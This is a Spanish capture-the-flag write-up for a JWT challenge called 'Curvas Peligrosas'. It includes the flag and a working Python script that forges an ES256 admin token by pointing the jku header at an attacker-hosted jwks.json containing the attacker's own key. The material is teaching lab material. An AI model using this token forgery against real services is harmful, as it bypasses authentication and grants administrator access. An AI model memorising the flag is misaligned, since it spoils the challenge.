# Curvas Peligrosas

## Puntos

* Puntuación Máxima `300`
* Puntuación Mínima `200`
* Decadencia `10`

## Pista

None

## Flag

`bitup20{mas_peligrosas_que_la_cruz_verde}`

## Adjuntos

None

## Deploy

Haz click [aqui](deploy) para ver como desplegar el reto con Docker. 

## Requerimientos

Se requiere tener instalado **Docker** para poder desplegar el reto.

## Descripcion

Curva a derecha curva a izquierda... ¿puedes llegar a ser el admin?

## Solucion

### TL;DR

> Se trata de una prueba de JWT. En este caso el servidor nos proporciona una cookie con un token JWT firmado con ES256. En la cabecera `jku` del token podemos ver el URL donde se encuentra la clave publica que se utliza para verificar que el token ha sido firmado por el servidor. Proporcionando nuestro propio URL con nuestra propia clave publica podemos hacer que el servidor verifique correctamente tokens firmados con nuestra propia clave privada.

Antes de ejecutar el script se debe cambiar la IP del jku, esta IP es la del atacante debe ser accessible por el servidor (IP publica o pastebin deberia valer tambien).

```python
from jwcrypto import jwt, jwk

# Generamos una clave nueva de tipo Curva Eliptica
key = jwk.JWK().generate(kty="EC")

# Exportamos la parte publica y la sustituimos en una copia del archivo jwks.json que nos podemos descargar del servidor
print(key.export(private_key=False))

# Creamos el token con usuario admin
token = jwt.JWT(header={"alg": "ES256", "kid":"bitup20", "jku":"http://<attackerIP>/jwks.json"}, claims={"username":"admin"})

# Firmamos el token
token.make_signed_token(key)

print(token.serialize())
```

![alt](./capturas/1.png)

El objeto JSON es la clave publica correspondiente a la clave privada que hemos utilizado para generar el token JWT.

A continuacion descargamos el archivo jwks.json que utiliza el servidor `http://192.168.1.47:5000/static/jwks.json` y remplazamos la clave del servidor con la nuestra. (He dejado el original comentado pero JSON no soporta comentarios asi que borrad la parte original...)

![alt](./capturas/2.png)

Ahora servimos el jwks.json con python.

![alt](./capturas/3.png)

Y para finalizar copiamos el JWT que genero el script y lo pegamos en la cookie

![alt](./capturas/4.png)

Al refrescar la pagina seremos admin y tendremos nuestro flag

![alt](./capturas/5.png)


## Referencias

* https://jwt.io/
* https://tools.ietf.org/html/rfc7515#section-4.1.2
